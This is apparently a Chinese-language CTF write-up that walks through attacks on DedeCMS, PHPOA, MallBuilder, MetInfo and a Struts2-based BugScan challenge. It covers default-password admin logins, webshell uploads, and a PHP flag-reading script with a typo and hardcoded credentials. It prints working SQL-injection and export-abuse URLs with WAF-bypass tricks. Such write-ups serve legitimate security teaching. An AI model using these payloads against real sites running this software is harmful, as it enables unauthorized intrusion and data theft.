作者:ByStudent
题目名字 | 题目分值 | 地址 |
MallBuilder2 | 350 | mall.anquanbao.com.cn |
MallBuilder1 | 200 | mall.anquanbao.com.cn |
DedeCMS2 | 300 | cms.anquanbao.com.cn |
DedeCMS1 | 200 | cms.anquanbao.com.cn |
MetInfo2 | 300 | info.anquanbao.com.cn |
MetInfo1 | 200 | info.anquanbao.com.cn |
PHPOA2 | 200 | oa.anquanbao.com.cn |
PHPOA1 | 150 | oa.anquanbao.com.cn |
BugScan1 | 500 | scan.anquanbao.com.cn |
0x01 DedeCMS
首先看到了织梦,直接admin 123456登录进去,发现左侧是空白的。
通过文件直接访问文件管理器。
/dede/file_manage_main.php?activepath=/uploads
在根目录下找到第一个flag,然后发现别人都瞬间750分了,然后挨个看了下flag.txt,拿到三个flag。
上传之类的都不行,直接写个pht秒之。但是服务器特别的卡,也是醉了,一句话连不上,上了个大马,然后找数据库配置文件,找到后发现不可读。正卡着的时候发现flag.txt被删了,后台密码也被改了,所以啊,就改了后台,删了好多重要文件。
最后竟然发现文件都是777,然后把config改成了.txt,然后就读到了配置文件。
不过waf甚为强大。。
可以登录数据库,可以看到表dede_flag,但是就是没法读取数据,索性写一个php文件读算了。。
0x02 PHPOA
这个乌云有案例,带脚本,任意文件上传。直接传个大马,这个数据库是可以直接读的,读到之后再写个php文件读取数据库中的flag。
案例传送门:
http://www.wooyun.org/bugs/wooyun-2010-163275
但是现在(写writeup的时候)上面的方法已经不能用了,很多东西都过滤了,不过可以传一个一句话,然后post这样读。。
然后写文件读取flag。
Getflag.php
<?php
$con = mysql_connect("localhost","root","2c2984bg");
$db_selected = mysql_selecst_db("flag",$con);
$sql = "SELECT * from flag";
$result = mysql_query($sql,$con);
while ($row = mysql_fetch_array($result)) {
var_dump($row);
}
mysql_free_result($result);
mysql_close($con);
?>
0x03 MallBuilder
flag.txt这时候不能访问了,访问就405,随便加个post就绕过了。
乌云搜了下,搜到了MallBuilder 参数 brand 注入漏洞。
http://www.wooyun.org/bugs/wooyun-2010-0176842
但是只能读文件,怎么也绕不过waf,安全宝很强悍啊,什么都405。
然后又搜到了一篇文章,用小数去绕过空格。
http://wooyun.org/bugs/wooyun-2010-0157857
http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x'and 1=2.11111Order by 44%23
终极Payload
http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x'and 1=2.2Union%0aSELECT%0a 1,2,3,4,5,(select name fromflag),7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23
0x04 MetInfo
MetInfo 5.2.4,这个也是乌云案例:MetInfo最新版(5.2.4)一处SQL盲注漏洞
http://www.wooyun.org/bugs/wooyun-2014-055338
这个最简单的方法,直接把表名改成flag,然后会下载一个excel表格,打开就是flag,因为flag被设置成了表名……Orz
http://info.anquanbao.com.cn//admin/content/feedback/export.php?met_parameter_1=flag--;&class1=1&settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter
0x05 BugScan
这个首先随便试了下,Tomcat/7.0.68 。找到了这个:
http://scan.anquanbao.com.cn/memoedit.action
猜测是Struts2,用工具试了下,确实存在S2-032,然而waf却拦截了命令执行。
试了好多种绕过的方法都绕不过去,无论什么都拦截,也是奇葩啊,最后无奈了,还是用最传统的方法:超长URL绕过去了,100w+。flag在根目录下。
©本文章为《安全智库》的原创作者投稿,转载请注明版权。
http://mp.weixin.qq.com/s?__biz=MzI0NjQxODg0Ng==&mid=2247483766&idx=1&sn=1083cb1be8ffd25e052fb3510ad39918&scene=22&srcid=0616gCOUnR1mvvbZrLKKvTtP#rd
看不到图片的看原文吧,图片懒得加了,只是借鉴一下CTF的思路